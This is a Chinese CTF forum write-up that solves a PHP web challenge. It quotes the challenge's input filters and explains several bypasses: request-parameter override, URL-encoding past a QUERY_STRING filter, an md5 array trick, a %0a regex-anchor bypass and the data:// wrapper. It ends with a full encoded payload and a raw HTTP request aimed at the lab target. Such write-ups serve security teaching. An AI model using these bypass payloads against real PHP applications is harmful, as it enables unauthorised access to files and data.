论坛首页 > CTF&WP专版

CTF-11解题思路

Track-子羽   ·   发表于 2021-11-17 11:55:57   ·   CTF&WP专版

源码分析:

  1. foreach ($_REQUEST as $key => $value) {
  2.         if(preg_match('/[a-zA-Z]/i', $value))   die('Hello Hack.');
  3.     }

利用解析时,按照环境变量,get,post的顺序,用post进行覆盖

  1. if($_SERVER){
  2.     if(preg_match('/cyber|flag|ciscn/i', $_SERVER['QUERY_STRING']))  die('Hello Hack..');
  3. }

利用server[query_string]不进行url解码的特性绕过

  1. if(!(substr($_GET['cyber'], 32) === md5($_GET['cyber']))){ 
  2.         die('Hello Hack...');

数组绕过

  1. if(preg_match('/^ciscnsec$/', $_GET['ciscn']) && $_GET['ciscn'] !== 'ciscnsec'){
  2.             $getflag = file_get_contents($_GET['flag']);

首先正则没有/d,因此用%0a绕过
然后file部分利用data伪协议控制内容

  1. POST:cyber[]=ciscnsec&flag=data://text/plain,security&ciscn=ciscnsec
  2. (需要进行url编码)

payload:

  1. POST:%63%79%62%65%72[]=%63%69%73%63%6e%73%65%63&%66%6c%61%67=data://text/plain,%73%65%63%75%72%69%74%79&%63%69%73%63%6e=%63%69%73%63%6e%73%65%63%0a
  3. 数据包:
  4. POST /?%63%79%62%65%72[]=%63%69%73%63%6e%73%65%63&%66%6c%61%67=data://text/plain,%73%65%63%75%72%69%74%79&%63%69%73%63%6e=%63%69%73%63%6e%73%65%63%0a HTTP/1.1
  5. Host: 靶场ip
  6. User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0
  7. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  8. Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
  9. Accept-Encoding: gzip, deflate
  10. DNT: 1
  11. X-Forwarded-For: 127.0.0.1
  12. Connection: keep-alive
  13. Upgrade-Insecure-Requests: 1
  14. Content-Type: application/x-www-form-urlencoded
  15. Content-Length: 21
  17. cyber=123&flag=123124&ciscn=111

打赏我,让我更有动力~

0 条回复   |  直到 2021-11-17 | 1045 次浏览
登录后才可发表内容
返回顶部 投诉反馈

© 2016 - 2024 掌控者 All Rights Reserved.